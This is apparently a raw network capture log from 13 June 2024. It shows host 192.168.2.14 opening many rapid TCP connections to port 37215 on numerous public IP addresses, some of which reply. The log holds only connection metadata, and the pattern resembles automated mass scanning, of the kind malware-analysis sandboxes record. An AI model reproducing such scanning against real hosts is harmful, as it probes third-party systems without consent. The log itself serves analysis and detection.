                                                        Jun 13, 2024 21:32:03.278347969 CEST5286837215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:03.278362989 CEST5578037215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.278368950 CEST5578037215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.278387070 CEST5603637215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.278400898 CEST4000037215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.278400898 CEST4000037215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.278422117 CEST4025637215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.278439045 CEST3458637215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.278439045 CEST3458637215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.278464079 CEST3484237215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.278491974 CEST3843237215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.278491974 CEST3843237215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.278512955 CEST3868837215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.278544903 CEST4365437215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.278544903 CEST4365437215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.278549910 CEST4391037215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.278583050 CEST5902237215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.278583050 CEST5902237215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.278605938 CEST5927837215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.278625965 CEST6028237215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.278652906 CEST6053837215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.278659105 CEST6028237215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.278695107 CEST3390037215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.278695107 CEST3390037215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.278698921 CEST3415637215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.278728008 CEST4131637215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.278728008 CEST4131637215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.278738976 CEST4157237215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.278769970 CEST5413037215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.278770924 CEST5413037215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.278793097 CEST5438637215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.278816938 CEST3944037215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.278816938 CEST3944037215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.278836966 CEST3969637215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.278861046 CEST3838037215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.278861046 CEST3838037215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.278867960 CEST3863637215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.278892040 CEST3600837215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.278899908 CEST3600837215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.278918982 CEST3626437215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.278940916 CEST4826237215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.278940916 CEST4826237215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.278980970 CEST4851837215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.278980970 CEST5766037215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.278989077 CEST5791637215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.278980970 CEST5766037215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.279006958 CEST5347637215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.279016018 CEST5347637215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.279038906 CEST5373237215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.279062033 CEST3597837215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:03.279062033 CEST3597837215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:03.279088020 CEST3623437215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:03.279098988 CEST5462437215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:03.279098988 CEST5462437215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:03.279117107 CEST5488037215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:03.279138088 CEST5073037215192.168.2.1441.46.40.162
                                                        Jun 13, 2024 21:32:03.279148102 CEST5073037215192.168.2.1441.46.40.162
                                                        Jun 13, 2024 21:32:03.279174089 CEST5098637215192.168.2.1441.46.40.162
                                                        Jun 13, 2024 21:32:03.279195070 CEST5140637215192.168.2.14197.100.45.9
                                                        Jun 13, 2024 21:32:03.279195070 CEST5140637215192.168.2.14197.100.45.9
                                                        Jun 13, 2024 21:32:03.279228926 CEST5166237215192.168.2.14197.100.45.9
                                                        Jun 13, 2024 21:32:03.279237032 CEST5068237215192.168.2.14156.66.84.142
                                                        Jun 13, 2024 21:32:03.279258966 CEST5068237215192.168.2.14156.66.84.142
                                                        Jun 13, 2024 21:32:03.279262066 CEST5093837215192.168.2.14156.66.84.142
                                                        Jun 13, 2024 21:32:03.279278040 CEST5545237215192.168.2.14156.71.135.100
                                                        Jun 13, 2024 21:32:03.279285908 CEST5545237215192.168.2.14156.71.135.100
                                                        Jun 13, 2024 21:32:03.279319048 CEST5570837215192.168.2.14156.71.135.100
                                                        Jun 13, 2024 21:32:03.279321909 CEST4114037215192.168.2.1441.222.216.67
                                                        Jun 13, 2024 21:32:03.279331923 CEST4114037215192.168.2.1441.222.216.67
                                                        Jun 13, 2024 21:32:03.279344082 CEST4139637215192.168.2.1441.222.216.67
                                                        Jun 13, 2024 21:32:03.279361963 CEST4404837215192.168.2.1441.222.186.62
                                                        Jun 13, 2024 21:32:03.279382944 CEST4404837215192.168.2.1441.222.186.62
                                                        Jun 13, 2024 21:32:03.279398918 CEST4430437215192.168.2.1441.222.186.62
                                                        Jun 13, 2024 21:32:03.279433012 CEST4792637215192.168.2.14197.69.68.79
                                                        Jun 13, 2024 21:32:03.279433012 CEST4792637215192.168.2.14197.69.68.79
                                                        Jun 13, 2024 21:32:03.279443979 CEST4818237215192.168.2.14197.69.68.79
                                                        Jun 13, 2024 21:32:03.279463053 CEST3539037215192.168.2.14197.21.174.146
                                                        Jun 13, 2024 21:32:03.279463053 CEST3539037215192.168.2.14197.21.174.146
                                                        Jun 13, 2024 21:32:03.279484034 CEST3564637215192.168.2.14197.21.174.146
                                                        Jun 13, 2024 21:32:03.279503107 CEST4187037215192.168.2.1441.153.95.121
                                                        Jun 13, 2024 21:32:03.279512882 CEST4187037215192.168.2.1441.153.95.121
                                                        Jun 13, 2024 21:32:03.279531002 CEST4212637215192.168.2.1441.153.95.121
                                                        Jun 13, 2024 21:32:03.279541016 CEST3638037215192.168.2.1441.243.166.99
                                                        Jun 13, 2024 21:32:03.279553890 CEST3638037215192.168.2.1441.243.166.99
                                                        Jun 13, 2024 21:32:03.279566050 CEST3663637215192.168.2.1441.243.166.99
                                                        Jun 13, 2024 21:32:03.279587030 CEST4450437215192.168.2.14197.110.122.85
                                                        Jun 13, 2024 21:32:03.279587030 CEST4450437215192.168.2.14197.110.122.85
                                                        Jun 13, 2024 21:32:03.279616117 CEST4476037215192.168.2.14197.110.122.85
                                                        Jun 13, 2024 21:32:03.279634953 CEST3792837215192.168.2.14197.183.92.21
                                                        Jun 13, 2024 21:32:03.279634953 CEST3792837215192.168.2.14197.183.92.21
                                                        Jun 13, 2024 21:32:03.279665947 CEST3818437215192.168.2.14197.183.92.21
                                                        Jun 13, 2024 21:32:03.279674053 CEST3680237215192.168.2.14156.104.85.254
                                                        Jun 13, 2024 21:32:03.279705048 CEST3680237215192.168.2.14156.104.85.254
                                                        Jun 13, 2024 21:32:03.279705048 CEST3705837215192.168.2.14156.104.85.254
                                                        Jun 13, 2024 21:32:03.279736996 CEST5520837215192.168.2.14156.134.246.13
                                                        Jun 13, 2024 21:32:03.279736996 CEST5520837215192.168.2.14156.134.246.13
                                                        Jun 13, 2024 21:32:03.279762030 CEST5546437215192.168.2.14156.134.246.13
                                                        Jun 13, 2024 21:32:03.279772043 CEST5998237215192.168.2.14197.40.126.172
                                                        Jun 13, 2024 21:32:03.279772043 CEST5998237215192.168.2.14197.40.126.172
                                                        Jun 13, 2024 21:32:03.279791117 CEST6023837215192.168.2.14197.40.126.172
                                                        Jun 13, 2024 21:32:03.279817104 CEST6065437215192.168.2.14156.67.134.124
                                                        Jun 13, 2024 21:32:03.279817104 CEST6065437215192.168.2.14156.67.134.124
                                                        Jun 13, 2024 21:32:03.279854059 CEST6091037215192.168.2.14156.67.134.124
                                                        Jun 13, 2024 21:32:03.279880047 CEST5129237215192.168.2.1441.3.16.29
                                                        Jun 13, 2024 21:32:03.279880047 CEST5129237215192.168.2.1441.3.16.29
                                                        Jun 13, 2024 21:32:03.279895067 CEST5154837215192.168.2.1441.3.16.29
                                                        Jun 13, 2024 21:32:03.279910088 CEST4408037215192.168.2.1441.76.31.108
                                                        Jun 13, 2024 21:32:03.279916048 CEST4408037215192.168.2.1441.76.31.108
                                                        Jun 13, 2024 21:32:03.279946089 CEST4433637215192.168.2.1441.76.31.108
                                                        Jun 13, 2024 21:32:03.279973984 CEST6056037215192.168.2.14197.93.242.33
                                                        Jun 13, 2024 21:32:03.279973984 CEST6056037215192.168.2.14197.93.242.33
                                                        Jun 13, 2024 21:32:03.279979944 CEST6081637215192.168.2.14197.93.242.33
                                                        Jun 13, 2024 21:32:03.279997110 CEST3999837215192.168.2.14156.224.187.4
                                                        Jun 13, 2024 21:32:03.279997110 CEST3999837215192.168.2.14156.224.187.4
                                                        Jun 13, 2024 21:32:03.280011892 CEST4025437215192.168.2.14156.224.187.4
                                                        Jun 13, 2024 21:32:03.280029058 CEST4973437215192.168.2.14197.158.144.70
                                                        Jun 13, 2024 21:32:03.280029058 CEST4973437215192.168.2.14197.158.144.70
                                                        Jun 13, 2024 21:32:03.280054092 CEST4999037215192.168.2.14197.158.144.70
                                                        Jun 13, 2024 21:32:03.280073881 CEST4562237215192.168.2.1441.117.110.130
                                                        Jun 13, 2024 21:32:03.280096054 CEST4562237215192.168.2.1441.117.110.130
                                                        Jun 13, 2024 21:32:03.280102015 CEST4587837215192.168.2.1441.117.110.130
                                                        Jun 13, 2024 21:32:03.283806086 CEST3721554936197.48.254.185192.168.2.14
                                                        Jun 13, 2024 21:32:03.284146070 CEST3721555192197.48.254.185192.168.2.14
                                                        Jun 13, 2024 21:32:03.284157991 CEST3721536604197.242.2.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.284193993 CEST5519237215192.168.2.14197.48.254.185
                                                        Jun 13, 2024 21:32:03.284214973 CEST5519237215192.168.2.14197.48.254.185
                                                        Jun 13, 2024 21:32:03.284235001 CEST5684837215192.168.2.1441.116.81.92
                                                        Jun 13, 2024 21:32:03.284327030 CEST3721536860197.242.2.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.284337997 CEST3721543222197.91.248.132192.168.2.14
                                                        Jun 13, 2024 21:32:03.284348011 CEST3721543478197.91.248.132192.168.2.14
                                                        Jun 13, 2024 21:32:03.284372091 CEST3686037215192.168.2.14197.242.2.51
                                                        Jun 13, 2024 21:32:03.284388065 CEST4347837215192.168.2.14197.91.248.132
                                                        Jun 13, 2024 21:32:03.284416914 CEST3686037215192.168.2.14197.242.2.51
                                                        Jun 13, 2024 21:32:03.284420967 CEST4347837215192.168.2.14197.91.248.132
                                                        Jun 13, 2024 21:32:03.284442902 CEST3803037215192.168.2.1441.231.104.109
                                                        Jun 13, 2024 21:32:03.284462929 CEST3312037215192.168.2.1441.249.78.118
                                                        Jun 13, 2024 21:32:03.284547091 CEST372155501241.233.24.79192.168.2.14
                                                        Jun 13, 2024 21:32:03.284559011 CEST372155526841.233.24.79192.168.2.14
                                                        Jun 13, 2024 21:32:03.284619093 CEST5526837215192.168.2.1441.233.24.79
                                                        Jun 13, 2024 21:32:03.284651041 CEST5526837215192.168.2.1441.233.24.79
                                                        Jun 13, 2024 21:32:03.284662962 CEST4172237215192.168.2.1441.200.26.96
                                                        Jun 13, 2024 21:32:03.284667015 CEST3721547938197.22.52.175192.168.2.14
                                                        Jun 13, 2024 21:32:03.284677982 CEST3721548194197.22.52.175192.168.2.14
                                                        Jun 13, 2024 21:32:03.284699917 CEST372155431841.108.76.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.284713984 CEST4819437215192.168.2.14197.22.52.175
                                                        Jun 13, 2024 21:32:03.284746885 CEST4819437215192.168.2.14197.22.52.175
                                                        Jun 13, 2024 21:32:03.284771919 CEST4797037215192.168.2.14197.128.125.18
                                                        Jun 13, 2024 21:32:03.284883022 CEST372155457441.108.76.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.284893036 CEST3721555146156.69.91.78192.168.2.14
                                                        Jun 13, 2024 21:32:03.284936905 CEST5457437215192.168.2.1441.108.76.82
                                                        Jun 13, 2024 21:32:03.284971952 CEST5457437215192.168.2.1441.108.76.82
                                                        Jun 13, 2024 21:32:03.284977913 CEST3857237215192.168.2.14156.196.212.117
                                                        Jun 13, 2024 21:32:03.284997940 CEST3721555402156.69.91.78192.168.2.14
                                                        Jun 13, 2024 21:32:03.285010099 CEST372153867641.11.229.119192.168.2.14
                                                        Jun 13, 2024 21:32:03.285020113 CEST372153893241.11.229.119192.168.2.14
                                                        Jun 13, 2024 21:32:03.285041094 CEST5540237215192.168.2.14156.69.91.78
                                                        Jun 13, 2024 21:32:03.285053015 CEST3893237215192.168.2.1441.11.229.119
                                                        Jun 13, 2024 21:32:03.285075903 CEST5540237215192.168.2.14156.69.91.78
                                                        Jun 13, 2024 21:32:03.285096884 CEST4512437215192.168.2.14156.202.193.218
                                                        Jun 13, 2024 21:32:03.285119057 CEST3893237215192.168.2.1441.11.229.119
                                                        Jun 13, 2024 21:32:03.285136938 CEST3721555342156.18.235.240192.168.2.14
                                                        Jun 13, 2024 21:32:03.285145044 CEST3539237215192.168.2.1441.160.163.109
                                                        Jun 13, 2024 21:32:03.285218000 CEST3721555598156.18.235.240192.168.2.14
                                                        Jun 13, 2024 21:32:03.285228968 CEST372154728041.139.66.154192.168.2.14
                                                        Jun 13, 2024 21:32:03.285258055 CEST5559837215192.168.2.14156.18.235.240
                                                        Jun 13, 2024 21:32:03.285284042 CEST5559837215192.168.2.14156.18.235.240
                                                        Jun 13, 2024 21:32:03.285296917 CEST3833237215192.168.2.1441.211.167.205
                                                        Jun 13, 2024 21:32:03.285470009 CEST372154753641.139.66.154192.168.2.14
                                                        Jun 13, 2024 21:32:03.285491943 CEST3721544450156.29.70.149192.168.2.14
                                                        Jun 13, 2024 21:32:03.285521030 CEST4753637215192.168.2.1441.139.66.154
                                                        Jun 13, 2024 21:32:03.285558939 CEST4753637215192.168.2.1441.139.66.154
                                                        Jun 13, 2024 21:32:03.285559893 CEST4329637215192.168.2.14197.213.58.236
                                                        Jun 13, 2024 21:32:03.285576105 CEST3721544706156.29.70.149192.168.2.14
                                                        Jun 13, 2024 21:32:03.285587072 CEST3721560942197.133.27.79192.168.2.14
                                                        Jun 13, 2024 21:32:03.285610914 CEST4470637215192.168.2.14156.29.70.149
                                                        Jun 13, 2024 21:32:03.285657883 CEST4470637215192.168.2.14156.29.70.149
                                                        Jun 13, 2024 21:32:03.285660028 CEST5310437215192.168.2.14197.246.186.62
                                                        Jun 13, 2024 21:32:03.285778999 CEST3721532966197.133.27.79192.168.2.14
                                                        Jun 13, 2024 21:32:03.285789967 CEST3721554888156.38.21.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.285836935 CEST3296637215192.168.2.14197.133.27.79
                                                        Jun 13, 2024 21:32:03.285847902 CEST3296637215192.168.2.14197.133.27.79
                                                        Jun 13, 2024 21:32:03.285871029 CEST4605237215192.168.2.1441.221.133.250
                                                        Jun 13, 2024 21:32:03.285886049 CEST3721555144156.38.21.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.285933971 CEST5514437215192.168.2.14156.38.21.80
                                                        Jun 13, 2024 21:32:03.285948992 CEST5514437215192.168.2.14156.38.21.80
                                                        Jun 13, 2024 21:32:03.285959959 CEST5118437215192.168.2.1441.223.127.19
                                                        Jun 13, 2024 21:32:03.285976887 CEST372154033441.130.177.177192.168.2.14
                                                        Jun 13, 2024 21:32:03.286138058 CEST372154059041.130.177.177192.168.2.14
                                                        Jun 13, 2024 21:32:03.286178112 CEST4059037215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:03.286196947 CEST4059037215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:03.286235094 CEST4209437215192.168.2.14156.233.152.133
                                                        Jun 13, 2024 21:32:03.286278009 CEST3721551504197.233.249.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.286288977 CEST3721551760197.233.249.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.286298990 CEST3721559982156.81.45.147192.168.2.14
                                                        Jun 13, 2024 21:32:03.286319017 CEST3721560238156.81.45.147192.168.2.14
                                                        Jun 13, 2024 21:32:03.286319017 CEST5176037215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:03.286329031 CEST3721549516197.9.246.39192.168.2.14
                                                        Jun 13, 2024 21:32:03.286339998 CEST3721549772197.9.246.39192.168.2.14
                                                        Jun 13, 2024 21:32:03.286350965 CEST3721536142156.98.217.11192.168.2.14
                                                        Jun 13, 2024 21:32:03.286353111 CEST6023837215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:03.286360025 CEST5176037215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:03.286371946 CEST4977237215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:03.286407948 CEST4770837215192.168.2.14156.199.108.201
                                                        Jun 13, 2024 21:32:03.286417007 CEST6023837215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:03.286422014 CEST4977237215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:03.286453962 CEST5412437215192.168.2.1441.19.210.36
                                                        Jun 13, 2024 21:32:03.286472082 CEST5227237215192.168.2.14197.13.47.35
                                                        Jun 13, 2024 21:32:03.287568092 CEST3721536398156.98.217.11192.168.2.14
                                                        Jun 13, 2024 21:32:03.287580013 CEST3721556784156.120.5.105192.168.2.14
                                                        Jun 13, 2024 21:32:03.287600994 CEST3721557040156.120.5.105192.168.2.14
                                                        Jun 13, 2024 21:32:03.287616014 CEST3639837215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:03.287621021 CEST3721542178156.143.125.114192.168.2.14
                                                        Jun 13, 2024 21:32:03.287633896 CEST5704037215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:03.287653923 CEST3639837215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:03.287671089 CEST6002837215192.168.2.14156.25.200.5
                                                        Jun 13, 2024 21:32:03.287695885 CEST5704037215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:03.287709951 CEST4634637215192.168.2.14156.149.195.24
                                                        Jun 13, 2024 21:32:03.288949013 CEST3721542434156.143.125.114192.168.2.14
                                                        Jun 13, 2024 21:32:03.288959980 CEST372155891441.165.251.84192.168.2.14
                                                        Jun 13, 2024 21:32:03.288970947 CEST372155917041.165.251.84192.168.2.14
                                                        Jun 13, 2024 21:32:03.288980961 CEST3721534630197.125.218.39192.168.2.14
                                                        Jun 13, 2024 21:32:03.288991928 CEST3721534886197.125.218.39192.168.2.14
                                                        Jun 13, 2024 21:32:03.289000034 CEST4243437215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:03.289000988 CEST3721555302156.153.254.119192.168.2.14
                                                        Jun 13, 2024 21:32:03.289011002 CEST3721555558156.153.254.119192.168.2.14
                                                        Jun 13, 2024 21:32:03.289021015 CEST3721543184197.126.217.241192.168.2.14
                                                        Jun 13, 2024 21:32:03.289024115 CEST5917037215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:03.289027929 CEST3488637215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:03.289032936 CEST3721543440197.126.217.241192.168.2.14
                                                        Jun 13, 2024 21:32:03.289038897 CEST5555837215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:03.289043903 CEST372153941241.73.171.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.289043903 CEST4243437215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:03.289056063 CEST372153966841.73.171.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.289064884 CEST3721546608156.175.107.161192.168.2.14
                                                        Jun 13, 2024 21:32:03.289071083 CEST6021637215192.168.2.1441.191.40.211
                                                        Jun 13, 2024 21:32:03.289076090 CEST3721546864156.175.107.161192.168.2.14
                                                        Jun 13, 2024 21:32:03.289082050 CEST4344037215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:03.289086103 CEST3966837215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:03.289086103 CEST3721535164197.144.49.247192.168.2.14
                                                        Jun 13, 2024 21:32:03.289097071 CEST3721535420197.144.49.247192.168.2.14
                                                        Jun 13, 2024 21:32:03.289107084 CEST3721547422197.44.145.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.289117098 CEST3721547678197.44.145.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.289123058 CEST4686437215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:03.289128065 CEST3721548552156.157.250.81192.168.2.14
                                                        Jun 13, 2024 21:32:03.289130926 CEST3542037215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:03.289138079 CEST5917037215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:03.289145947 CEST4767837215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:03.289150953 CEST3488637215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:03.289161921 CEST3721548808156.157.250.81192.168.2.14
                                                        Jun 13, 2024 21:32:03.289174080 CEST372153868241.97.40.48192.168.2.14
                                                        Jun 13, 2024 21:32:03.289170027 CEST5555837215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:03.289185047 CEST372153893841.97.40.48192.168.2.14
                                                        Jun 13, 2024 21:32:03.289190054 CEST3721557874197.41.203.209192.168.2.14
                                                        Jun 13, 2024 21:32:03.289197922 CEST4344037215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:03.289201975 CEST3721558130197.41.203.209192.168.2.14
                                                        Jun 13, 2024 21:32:03.289206982 CEST4880837215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:03.289212942 CEST372155977641.4.72.60192.168.2.14
                                                        Jun 13, 2024 21:32:03.289222002 CEST372156003241.4.72.60192.168.2.14
                                                        Jun 13, 2024 21:32:03.289222956 CEST3893837215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:03.289242983 CEST3721553164156.148.90.191192.168.2.14
                                                        Jun 13, 2024 21:32:03.289244890 CEST3966837215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:03.289248943 CEST5813037215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:03.289252043 CEST3486037215192.168.2.1441.96.239.161
                                                        Jun 13, 2024 21:32:03.289252043 CEST6003237215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:03.289252996 CEST4686437215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:03.289254904 CEST3721553420156.148.90.191192.168.2.14
                                                        Jun 13, 2024 21:32:03.289264917 CEST3721548722197.138.1.242192.168.2.14
                                                        Jun 13, 2024 21:32:03.289274931 CEST3721548978197.138.1.242192.168.2.14
                                                        Jun 13, 2024 21:32:03.289285898 CEST372155953441.226.180.166192.168.2.14
                                                        Jun 13, 2024 21:32:03.289287090 CEST5811237215192.168.2.1441.79.41.75
                                                        Jun 13, 2024 21:32:03.289289951 CEST5342037215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:03.289289951 CEST3311437215192.168.2.14197.147.57.78
                                                        Jun 13, 2024 21:32:03.289297104 CEST372155979041.226.180.166192.168.2.14
                                                        Jun 13, 2024 21:32:03.289307117 CEST372154727841.8.89.25192.168.2.14
                                                        Jun 13, 2024 21:32:03.289308071 CEST4897837215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:03.289316893 CEST372154753441.8.89.25192.168.2.14
                                                        Jun 13, 2024 21:32:03.289326906 CEST3721559614156.105.185.32192.168.2.14
                                                        Jun 13, 2024 21:32:03.289335012 CEST5979037215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:03.289335966 CEST3721559870156.105.185.32192.168.2.14
                                                        Jun 13, 2024 21:32:03.289338112 CEST3606237215192.168.2.14197.151.164.204
                                                        Jun 13, 2024 21:32:03.289346933 CEST3721558444156.91.16.222192.168.2.14
                                                        Jun 13, 2024 21:32:03.289356947 CEST4753437215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:03.289370060 CEST3721558700156.91.16.222192.168.2.14
                                                        Jun 13, 2024 21:32:03.289375067 CEST5987037215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:03.289375067 CEST4764637215192.168.2.14156.32.187.77
                                                        Jun 13, 2024 21:32:03.289381027 CEST3721550158197.86.69.163192.168.2.14
                                                        Jun 13, 2024 21:32:03.289390087 CEST5689237215192.168.2.14156.245.123.173
                                                        Jun 13, 2024 21:32:03.289391041 CEST3721550414197.86.69.163192.168.2.14
                                                        Jun 13, 2024 21:32:03.289393902 CEST5870037215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:03.289402008 CEST372154163441.221.110.141192.168.2.14
                                                        Jun 13, 2024 21:32:03.289412022 CEST372154189041.221.110.141192.168.2.14
                                                        Jun 13, 2024 21:32:03.289422035 CEST372153759641.28.77.14192.168.2.14
                                                        Jun 13, 2024 21:32:03.289422989 CEST3542037215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:03.289432049 CEST372153785241.28.77.14192.168.2.14
                                                        Jun 13, 2024 21:32:03.289432049 CEST4767837215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:03.289438963 CEST5041437215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:03.289439917 CEST4880837215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:03.289442062 CEST3721539406197.17.79.167192.168.2.14
                                                        Jun 13, 2024 21:32:03.289448977 CEST4189037215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:03.289458036 CEST3893837215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:03.289463997 CEST3721539662197.17.79.167192.168.2.14
                                                        Jun 13, 2024 21:32:03.289473057 CEST3721548822197.174.171.58192.168.2.14
                                                        Jun 13, 2024 21:32:03.289482117 CEST6003237215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:03.289486885 CEST3785237215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:03.289486885 CEST5813037215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:03.289494991 CEST3721549078197.174.171.58192.168.2.14
                                                        Jun 13, 2024 21:32:03.289496899 CEST3966237215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:03.289504051 CEST5342037215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:03.289505959 CEST3721543284197.160.148.203192.168.2.14
                                                        Jun 13, 2024 21:32:03.289515972 CEST3721543540197.160.148.203192.168.2.14
                                                        Jun 13, 2024 21:32:03.289516926 CEST4897837215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:03.289525032 CEST3721541382156.46.54.126192.168.2.14
                                                        Jun 13, 2024 21:32:03.289527893 CEST5979037215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:03.289527893 CEST4907837215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:03.289535999 CEST3721541638156.46.54.126192.168.2.14
                                                        Jun 13, 2024 21:32:03.289546013 CEST3721533804156.236.184.245192.168.2.14
                                                        Jun 13, 2024 21:32:03.289552927 CEST4354037215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:03.289568901 CEST4163837215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:03.289577007 CEST3721534060156.236.184.245192.168.2.14
                                                        Jun 13, 2024 21:32:03.289582014 CEST4753437215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:03.289588928 CEST3721554346197.185.19.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.289588928 CEST5987037215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:03.289598942 CEST5870037215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:03.289601088 CEST3721554602197.185.19.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.289609909 CEST372154034441.31.232.127192.168.2.14
                                                        Jun 13, 2024 21:32:03.289612055 CEST3406037215192.168.2.14156.236.184.245
